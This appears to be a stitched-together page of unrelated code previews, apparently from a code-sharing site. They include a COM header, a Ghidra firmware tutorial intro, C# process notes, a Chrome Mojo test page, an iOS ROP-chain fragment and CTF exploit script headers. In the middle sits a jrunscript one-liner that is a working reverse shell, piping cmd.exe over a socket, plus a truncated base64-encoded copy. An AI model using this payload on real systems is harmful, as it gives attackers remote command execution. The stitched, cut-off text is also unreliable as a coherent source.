| typedef interface IEditionUpgradeManager IEditionUpgradeManager; | |
| typedef struct IEditionUpgradeManagerVtbl { | |
| BEGIN_INTERFACE | |
| HRESULT(STDMETHODCALLTYPE *QueryInterface)( | |
| __RPC__in IEditionUpgradeManager * This, | |
| __RPC__in REFIID riid, |
This brief tutorial will show you how to go about analyzing a raw binary firmware image in Ghidra.
I was recently interested in reversing some older Cisco IOS images. Those images come in the form of a single binary blob, without any sort of ELF, Mach-o, or PE header to describe the binary.
While I am using Cisco IOS Images in this example, the same process should apply to other Raw Binary Firmware Images.
Nashorn / Rhino:
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
| ==다른 프로세스 실행== | |
| System.Diagnostics.Process.Start("실행파일경로\실행파일명.exe",파라메터) | |
| System.Diagnostics.Process.Start("cmd.exe 명령어"); | |
| ==프로세스 종료== | |
| System.Diagnostics.Close(); // 프로세스의 리소스를 해재(종료) 시킨다. | |
| System.Diagnostics.CloseMainWindow(); // UI가 있는 프로세스에 메시지를 보내 종료 시킨다. | |
| System.Diagnostics.Kill(); // 즉시 프로세스를 종료시킨다. |
| # -*- coding: utf-8 -*- | |
| import os | |
| import sqlite3 | |
| from flask import Flask | |
| from flask import redirect | |
| from flask import request | |
| from flask import session | |
| from jinja2 import Template |
| <html> | |
| <pre id='log'></pre> | |
| <script src="mojo_bindings.js"></script> | |
| <script src="third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script> | |
| <script src="being_creator_interface.mojom.js"></script> | |
| <script src="food_interface.mojom.js"></script> | |
| <script src="dog_interface.mojom.js"></script> | |
| <script src="person_interface.mojom.js"></script> | |
| <script src="cat_interface.mojom.js"></script> | |
| <script> |
| //#define LOCAL_EXP | |
| #ifdef LOCAL_EXP | |
| printf("Testing ROP chain \n"); | |
| vm_address_t payload =0x118800000; | |
| kern_return_t kr = vm_allocate(mach_task_self(),&payload,payload_size,0); | |
| CHECK_MACH_ERR(kr,"vm_allocate()"); | |
| memcpy((void*)payload, main_payload,payload_size); | |
| char *buf = malloc(1000); | |
| memset(buf,0xcc,1000); |
| #!/bin/bash | |
| # ./remote server port 'menu string' | |
| touch "$1" || (echo "Cannot create file named $1" && exit 1) | |
| exec > "$1" | |
| echo 'from pwn import *' | |
| echo '' | |
| echo -e "HOST, PORT = \"$2\", \"$3\"" | |
| if [ ! -n "$HOST" ]; then HOST=0.0.0.0; fi |
| #!/usr/bin/python | |
| # Hack.lu CTF 2017 - HeapHeaven solution by n30m1nd | |
| # Challenge by FluxFingers - https://flatearth.fluxfingers.net/ | |
| from pwn import * | |
| from sys import * | |
| from struct import * | |
| def translate_baby(size): |
Aruba produces two different software loads for their Access Point hardware. The first is called ArubaOS and the second is called Aruba Instant. With ArubaOS, the AP requires a Mobility Controller (hardware) to be installed in the network. With the Aruba Instant it is possible to run AP’s independently (standalone mode) or in a cluster, with no Mobility Controller in the network.